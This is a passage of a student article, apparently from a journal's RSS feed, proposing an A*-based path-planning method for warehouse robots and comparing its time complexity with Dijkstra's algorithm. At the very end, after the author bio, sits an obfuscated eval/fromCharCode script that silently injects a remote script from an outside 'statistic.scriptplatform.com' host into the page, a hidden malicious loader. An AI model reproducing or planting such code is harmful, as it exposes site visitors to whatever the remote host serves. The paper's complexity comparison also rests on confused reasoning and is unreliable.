<p>The previous models discussed provide a foundational understanding of block warehouse layouts. How- ever, real-world warehouses present a more complex environment filled with various obstacles that robots must navigate around. These obstacles pose significant challenges for robot path planning algorithms. The obstacles can be static or dynamic. Static obstacles are permanent fixtures within the warehouse that robots cannot move through, which can include support pillars or walls, inventory storage racks and shelves and also designated no-go zones due to maintenance, safety reasons, or specific operations that require human intervention. Dynamic obstacles include elements that can change within the warehouse environment, creat- ing temporary blockages for robots. This reseacrh does not address actively moving obstacles but obstacles that may change positions but remain stationary during run-time. This research proposes a novel algorithm that addresses these challenges by modifying the heuristic function while taking effective obstacle avoidance into consideration.</p>



<h2 class="wp-block-heading">3 Algorithm Design</h2>



<p>This section describes our pathfinding algorithm designed for robots navigating a grid-based environment with obstacles. The algorithm modifies the A* search, a well-known technique for finding optimal paths in graphs or grids. A* search balances exploration of the search space with an informed prioritisation of promising paths. Our specific implementation focuses on finding the shortest path for a robot visiting multiple designated points within the warehouse.The problem can be formulated within the framework of a graph, where the warehouse layout is represented as a directed graph G = (V, E, D), comprising vertices V , edges E, and distances D.</p>



<p>Consider a path path P as P<sub>1</sub>, P<sub>2</sub>, &#8230;, Pn as shown in Figure 5, where each Pi denotes a coordinate on the x-y plane or the two-dimensional grid.</p>



<p>Vertices in the graph correspond to distinct locations within the warehouse, such as aisles, racks, inter- sections, and loading docks. Formally, V = {v<sub>1</sub>, v<sub>2</sub>, &#8230;, v<sub>n</sub>}, where n denotes the total number of vertices in the warehouse layout. Edges represent permissible paths or connections between vertices, denoting feasible routes that can be traversed by the warehouse vehicles or personnel. For any pair of vertices vi,vj in V, if there exists a direct path from v<sub>i</sub> to v<sub>j</sub>, then an edge e<sub>ij</sub> is present in E. Mathematically, E ⊆ V × V . The variable d represents the Manhattan distance between two nodes P1=(x<sub>1</sub>, y<sub>1</sub>) and P2=(x<sub>2</sub>, y<sub>2</sub>), which is simply given by:</p>



<p class="has-text-align-center">d(P<sub>1</sub>,P<sub>2</sub>)=|x<sub>2</sub> −x<sub>1</sub>|+|y<sub>2</sub> −y<sub>1</sub>|</p>



<p>This denotes the length or cost associated with traversing an edge in the warehouse graph. For any edge e<sub>ij</sub> in E, the distance d<sub>ij</sub> signifies the distance or cost to travel from vertex v<sub>i</sub> to vertex v<sub>j</sub>. Formally, D = {d<sub>ij</sub>}, 4</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="1018" height="942" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM.png" alt="" class="wp-image-3898" style="width:598px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM.png 1018w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-300x278.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-768x711.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-1000x925.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-230x213.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-350x324.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.17.23 PM-480x444.png 480w" sizes="(max-width: 1018px) 100vw, 1018px" /><figcaption class="wp-element-caption">Figure 5: Simplified model of a realistic block warehouse with obstacles.</figcaption></figure>



<p>where d<sub>ij</sub> denotes the distance between vertices v<sub>i</sub> and v<sub>j</sub>. Given this graph representation of the warehouse layout, the optimization problem can be formally defined as finding the most efficient path or sequence of vertices to navigate from a designated source location to a target destination, subject to various constraints and objectives.</p>



<h2 class="wp-block-heading">Mathematical Formulation</h2>



<p>Let f denote the objective function, which quantifies the efficiency metric to be optimized. This metric may vary depending on the specific objectives of the warehouse management system. The objective function f can be expressed as a function of the path traversed through the warehouse graph, represented by a sequence of vertices, where f : V → R, where R represents the set of real numbers. The optimization problem may be subject to various constraints imposed by the warehouse environment, vehicle characteristics, safety regulations, and operational requirements. These constraints may include limitations on vehicle speed, maximum load capacity, aisle width, aisle congestion, and restricted access zones. The total cost associated with traversing a given path P in the warehouse graph can be expressed as the sum of distances between consecutive vertices along the path. Mathematically, the total cost C(P) can be represented as:</p>



<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="620" height="200" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM.png" alt="" class="wp-image-3899" style="width:296px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM.png 620w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM-300x97.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM-230x74.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM-350x113.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.18.25 PM-480x155.png 480w" sizes="(max-width: 620px) 100vw, 620px" /></figure>



<p>where k represents the number of vertices in the path P, and d<sub>i,i+1</sub> denotes the distance between the i-th and (i + 1)-th vertices along the path. The variable x<sub>i,i+1</sub> is a binary variable: it takes the value 1 if the edge between vertices v<sub>i</sub> and v<sub>i+j</sub> is included in the graph, representing that the point is part of the path P ; otherwise, it takes the value 0.</p>



<p>The core principle behind the algorithm lies in the A* search algorithm, a well-established method for optimal pathfinding in graphs and grids. In our specific implementation, the algorithm aims to find the shortest path for a robot that needs to visit multiple designated points sequentially. The algorithm maintains a priority queue (heap) data structure. This queue stores potential paths, each represented as a tuple containing the total cost incurred so far (distance travelled by the robot), the current cell coordinates of the robot, and the path history, which tracks the sequence of cells visited to reach the current cell. The algorithm then iteratively explores the neighbours of the cell with the lowest total cost according to the priority queue. This prioritisation ensures that the algorithm focuses on paths that are most likely to lead to the goal efficiently.</p>



<p>To further guide exploration, the algorithm employs a heuristic function. This function estimates the remaining distance from the current cell to the final destination. In our case, we utilise the Manhattan distance heuristic. As stated above, it calculates the absolute difference in x and y coordinates between the current cell and the final destination, providing a simple and efficient estimate of the remaining distance. The estimated distance is then added to the actual cost to create the total cost for each path. This combined value guides the prioritisation within the heap, favouring paths that are geographically closer to the goal. The two key data structures utilised by the algorithm are the priority queue and the visited set structure. The priority queue prioritises elements based on a key value. In our implementation, the key value represents the total cost of a path, which is the sum of the actual cost traversed so far and the estimated remaining distance calculated by the heuristic function. The heap efficiently retrieves the cell with the lowest total cost for exploration at each step. This ensures that the algorithm explores promising paths with potentially lower overall costs first, leading to a faster discovery of the optimal path. This Visited Set stores the coordinates of all cells that have already been explored by the algorithm. Including a cell’s coordinates in the visited set after it has been explored ensures the algorithm doesn’t revisit previously explored areas. This prevents redundant exploration and focuses the search towards unexplored territories within the warehouse environment.</p>



<p>The algorithm incorporates obstacle detection to ensure the robot navigates only on valid paths. Before considering a neighbouring cell for exploration, the algorithm checks two conditions &#8211; the cell must be within the defined grid boundaries and the cell’s value in the grid representation must not be 1, which signifies an obstacle. By adhering to these conditions, the algorithm ensures that the robot only explores and utilises valid paths that are free of obstacles.</p>



<p>Once the robot reaches a designated point, the algorithm needs to reconstruct the complete path taken so far. This path reconstruction is done by the information stored within the priority queue. Each cell in the queue stores its parent cell in the path, indicating the cell from which it was explored. By backtracking through this parent-child relationship stored in the queue, the algorithm can reconstruct the complete path taken by the robot from the starting point to the current designated point. This backtracking process continues for each designated point the robot needs to visit. The algorithm finds the next closest unvisited point using the heuristic function and repeats the exploration process until all designated points are visited. By accumulating the reconstructed paths for each point, the algorithm obtains the final complete path for the entire robot navigation task. Figure 6 below shows a simplified flowchart indicating the basic principles of the algorithm.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="995" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-1024x995.png" alt="" class="wp-image-3900" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-1024x995.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-300x291.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-768x746.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-1000x971.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-230x223.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-350x340.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM-480x466.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.20.05 PM.png 1400w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 6: A basic understanding of the key principles of the algorithm.</figcaption></figure>



<h2 class="wp-block-heading">4 Comparative Analysis</h2>



<p>This section presents a comparative analysis of our proposed algorithm with Dijkstra’s algorithm, a popular pathfinding algorithm widely used today. Our aim is to evaluate the strengths and weaknesses of each approach in the context of robot pathfinding within warehouse environments with obstacles. This comparison will discuss the suitability of our algorithm for practical applications in warehouse navigation tasks.</p>



<h4 class="wp-block-heading">4.1 Time Complexity</h4>



<p>This section analyses the time complexity of the proposed algorithm and Dijkstra’s algorithm. Time com- plexity refers to the amount of time an algorithm takes to execute as the size of the input grows. In the context of robot pathfinding within a warehouse environment, the main factors affecting the input size are &#8211; the number of grid cells (V), the number of obstacles and the number of designated points (P).</p>



<h5 class="wp-block-heading">4.1.1 Proposed Algorithm</h5>



<p>The time complexity is analysed by taking the average and the worst case scenarios into consideration.</p>



<p><span style="text-decoration: underline;">Average Case</span> In the average case scenario, where the heuristic function provides a good estimate of the remaining distance, the time complexity of the proposed algorithm is expected to be:</p>



<p class="has-text-align-center">O((<sub>log</sub>b) ∗ V )</p>



<p>Where log b represents the repeated operations on the priority queue (heap) used for exploration, b represents the branching factor, which is the average number of neighbours a cell has in the grid. The logarithmic term reflects the efficient retrieval and update operations within the heap data structure and V represents the total number of grid cells.</p>



<p><span style="text-decoration: underline;">Worst Case</span> In the worst case scenario, where the heuristic function provides poor estimates, the time complexity of the algorithm can approach:</p>



<p class="has-text-align-center">O(W ∗<sub>log</sub>b∗V)</p>



<p>Here, W represents a factor dependent on the specific grid layout, obstacle distribution, and the starting and goal locations. This factor accounts for the additional exploration required due to the heuristic’s inef- ficiency in the worst case. However, the logarithmic term (log b) due to the heap operations and the linear term (V) representing the total number of cells are likely to dominate the complexity even in the worst case.</p>



<h5 class="wp-block-heading">4.1.2 Dijkstra’s Algorithm</h5>



<p>Dijkstra’s algorithm has a time complexity of:</p>



<p class="has-text-align-center">O(V +E∗<sub>log</sub>V)</p>



<p>Where, E Represents the total number of edges in the grid. In a warehouse environment, this translates to the number of valid connections between neighbouring cells.</p>



<h2 class="wp-block-heading">5 Results</h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="387" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-1024x387.png" alt="" class="wp-image-3901" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-1024x387.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-300x113.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-768x290.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-1536x581.png 1536w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-1000x378.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-230x87.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-350x132.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM-480x182.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.21.49 PM.png 1756w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 7: Average Case Time Complexity Comparison </figcaption></figure>



<p>In the average case, the proposed algorithm outperforms Dijkstra’s algorithm as shown in Figures 7 a. and b. due to the logarithmic term (log b) in its complexity. This logarithmic term stems from the efficient use of a priority queue (heap) data structure for exploration. The heap operations, like inserting and retrieving elements, take logarithmic time with respect to the number of elements in the heap. In the context of our algorithm, the number of elements in the heap corresponds to the number of promising paths being explored. As the warehouse environment (grid size) grows, the number of paths to explore increases. However, due to the logarithmic nature of heap operations, the time spent managing the exploration queue scales proportionally less significantly compared to Dijkstra’s algorithm.</p>



<p>Dijkstra’s algorithm, on the other hand, has a time complexity that includes a term linear in the number of grid cells (V) and edges (E). As the warehouse environment becomes larger, the number of cells and edges increases proportionally. This translates to a more significant growth in the execution time for Dijkstra’s algorithm compared to the proposed algorithm in the average case. Therefore,the logarithmic term in the proposed algorithm’s complexity signifies that the exploration process scales more efficiently with the size of the warehouse grid compared to Dijkstra’s algorithm. This efficiency advantage becomes more pronounced for larger warehouses, making the algorithm a more suitable choice in such scenarios.</p>



<p>While both algorithms can theoretically exhibit exponential dependence in the worst case, there are many potential advantages for the proposed algorithm in handling complex warehouse environments. Dijkstra’s algorithm’s dependence on the total number of grid cells (V) and edges (E) can lead to significant exploration overhead, especially in scenarios with dense obstacles or unfavourable start and goal locations. In such cases, the exhaustive exploration strategy of Dijkstra’s algorithm might struggle to efficiently navigate the environment.</p>



<p>On the other hand, our algorithm’s complexity includes a logarithmic term (log b) that stems from the efficient management of the exploration queue using a heap data structure. This logarithmic term helps to mitigate the impact of a growing number of potential paths on the processing time. Additionally, the proposed algorithm’s inherent prioritisation mechanism, guided by the heuristic function restricts the exploration to a more focused search space around promising paths. This focus can significantly reduce the number of irrelevant paths explored compared to Dijkstra’s exhaustive approach, potentially preventing the worst-case complexity from becoming extremely slow in complex warehouse environments. The results of the above can be seen in Figures 8 a. and b. below.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="379" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-1024x379.png" alt="" class="wp-image-3902" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-1024x379.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-300x111.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-768x284.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-1536x568.png 1536w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-1000x370.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-230x85.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-350x129.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM-480x177.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.22.21 PM.png 1742w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 8: Worst Case Time Complexity Comparison</figcaption></figure>



<p>Overall, by considering both average and worst-case scenarios, this comparative analysis highlights the potential of the proposed algorithm for efficient robot pathfinding in warehouse environments. The logarith- mic term in its complexity signifies efficient exploration management using a priority queue. This structure allows our algorithm to scale more efficiently as the warehouse size increases, making it a preferable choice for real-world scenarios. While there might be a slight trade-off for very small warehouses, the overall anal- ysis suggests that our proposed algorithm offers a significant time complexity advantage for larger and more realistic warehouse environments. The algorithm was developed with Python 3.12 and all simulations were done with MATLAB R2024a.</p>



<h2 class="wp-block-heading">6 Conclusion</h2>



<p>In this research, a critical aspect of our analysis was the time complexity of the proposed algorithm. Optimizing warehouse operations requires efficient navigation with the ability for robots to complete tasks in a timely manner. By comparing the time complexity of our algorithm to Dijkstra’s algorithm, we were able to demonstrate the efficiency gains achieved by our method, particularly in scenarios with larger warehouse layouts. This efficiency translates to faster retrieval and storage times, ultimately contributing to increased warehouse throughput. While this research focused on time complexity, future work can explore the energy efficiency of the proposed algorithm. Investigating the relationship between pathfinding strategies and robot energy consumption could pave the way for even more optimized warehouse operations that minimize energy use without compromising efficiency. Moreover, We highlighted the limitations of traditional pathfinding algorithms in these warehouse settings, particularly not taking obstacle avoidance into consideration and having higher time complexity. Further research can explore the integration of machine learning techniques to continuously learn and improve the algorithm’s performance in dynamic environments. Additionally, investigating methods for collaborative path planning between multiple robots operating within the warehouse could further optimize overall throughput and efficiency. By addressing the challenges of dynamic warehouse navigation, this research contributes to the development of more efficient and reliable automated systems for modern warehouses. This will play a vital role in supporting the ever-growing demands of the e-commerce sector and ensuring the smooth flow of goods within the supply chain.</p>



<h2 class="wp-block-heading">References</h2>



<ol class="wp-block-list">
<li>Liu, X., Cao, J., Yang, Y. &amp; Jiang, S. (2018). CPS-Based Smart Warehouse for Industry 4.0: A Survey of the Underlying Technologies. Computers, 7 (1) 13.</li>



<li>Roodbergen, K.J. &amp; De Koster, R. (2001). Routing methods for warehouses with multiple cross aisles. International Journal of Production Research, 39(9), 1865-1883.</li>



<li>Sanei, O., Nasiri, V., Marjani, M.R. &amp; Moattar Husseini, S.M. (2011). A heuristic algorithm for the warehouse space assignment problem considering operational constraints: with application in a case study. Proceedings of the 2011 International Conference on Industrial Engineering and Operations Management, Kuala Lumpur, Malaysia, January 22-24, 2011.</li>



<li>Shen, X., Yi, H. &amp; Wang, J. (2021). Optimization of picking in the warehouse. Journal of Physics: Conference Series, 1861.</li>



<li>Sun, Y., Fang, M. &amp; Su, Y. (2021). AGV Path Planning and Obstacle Avoidance Using Dijkstra’s Algorithm. Journal of Physics: Conference Series, 1746.</li>



<li>Yang, B., Li, W., Wang, J., Yang, J., Wang, T. &amp; Liu, X. (2020). A Novel Path Planning Algorithm for Warehouse Robots Based on a Two-Dimensional Grid Model. IEEE Access, 8, 80347-80357.</li>



<li>R. Liu. “Research on Optimization of the AGV Shortest-Path Model and Obstacle Avoidance Planning<br>in Dynamic Environments.” Mathematical Problems in Engineering. 2022. doi.org/10.1155/2022/2239342.</li>



<li>N. Shetty, B. Sah and S.H. Chung. 2020. “Route optimization for warehouse order picking operations via vehicle routing and simulation.” Springer Nature Applied Sciences. 2(311). doi.org/10.1007/s42452- 020-2076-x.</li>



<li>R. Tai, J. Wang, W. Chen. 2019. ”A prioritized planning algorithm of trajectory coordination based on time windows for multiple AGVs with delay disturbance.” Assembly Automation, 39(5): 753-768. doi.org/10.1108/AA-03-2019-0054.</li>



<li>J. Chen, X. Zhang, X. Peng, D. Xu and J. Peng. 2022. “Efficient routing for multi-AGV based on optimized Ant-agent,” Computers &amp; Industrial Engineering. 167. doi.org/10.1016/j.cie.2022.108042</li>



<li>Y. Zhou and N. Huang. 2022. “Airport AGV path optimization model based on ant colony algorithm to optimize Dijkstra algorithm in urban systems,” Sustainable Computing: Informatics and Systems, 35. doi.org/10.1016/j.suscom.2022.100716.</li>



<li>A. Meysami, J-C. Cuilli`ere, V. Franc ̧ois, and S. Kelouwani. 2022. “Investigating the impact of triangle and quadrangle mesh representations on AGV path planning for various indoor environments: with or without inflation,” Robotics, vol. 11(2):50. doi.org/10.3390/robotics11020050</li>
</ol>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Paarth Sonkiya</h5><p>Paarth is a 12th grade student from India. A coding wizard by day, stargazer by night. he is on a mission to unravel the mysteries of science, fueled by an unhealthy obsession with elegant algorithms and solutions. When Paarth is not debugging, you&#8217;ll find him scaling mountains or attempting to explain cloud computing to his sister. Paarth&#8217;s life goal is to write code so beautiful it makes other programmers weep – or at least mildly emotional. Still trying to figure out if P equals NP, but he&#8217;s pretty sure it equals &#8220;Need Pizza&#8221;.
</p></figure></div>



<p></p>


<p><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script></p><p>The post <a href="https://exploratiojournal.com/optimising-warehouse-navigation-a-novel-two-dimensional-grid-model-for-robot-path-planning-in-warehouse-logistics/">Optimising Warehouse Navigation: A Novel Two-Dimensional Grid Model for Robot Path Planning in Warehouse Logistics</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
